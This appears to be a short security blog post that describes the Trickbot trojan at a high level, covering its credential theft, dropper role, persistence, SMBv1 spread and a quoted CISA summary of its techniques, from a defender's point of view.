It is a nasty little trojan to begin with and many companies were caught up by it as few anti-malware solutions were really looking for the MSHTA pivot that was included. There are still far too many solutions that do not see that pivot and rely on detection signatures for the malware payload. This has led the malware developers to start working on additional techniques to avoid detection by them.
One of the primary functions of Trickbot is to steal credentials for use in obtaining further access or to exfiltrate data. It does this through a Man in the Browser tactic (T1185). It can also gather information through other methods as the malware acts as a dropper. Researchers have observed Trickbot used to deploy ransomware, and the Emotet Cryptominer (I have seen this one firsthand). Trickbot has multiple methods to maintain persistence on a targeted device. It really is like the Swiss Army Knife of malware. According to CISA:
“TrickBot is capable of data exfiltration over a hardcoded C2 server, cryptomining, and host enumeration (e.g., reconnaissance of Unified Extensible Firmware Interface or Basic Input/Output System [UEFI/BIOS] firmware) (Exfiltration Over C2 Channel [T1041], Resource Hijacking [T1496], System Information Discovery.[2] For host enumeration, operators deliver TrickBot in modules containing a configuration file with specific tasks.”
Trickbot has been known to spread over SMBv1 using captured credentials. This is not that much of a concern as everyone has this disabled right? It also relies on several pivots that should be disabled in most environments and even in the consumer market. The reliance malicious websites, documents and even SMBv1 are all things that should, at this stage, not be an option for attackers. Clearly there is a lot more work to be done in the security world as this type of malware continues to flourish and be effective.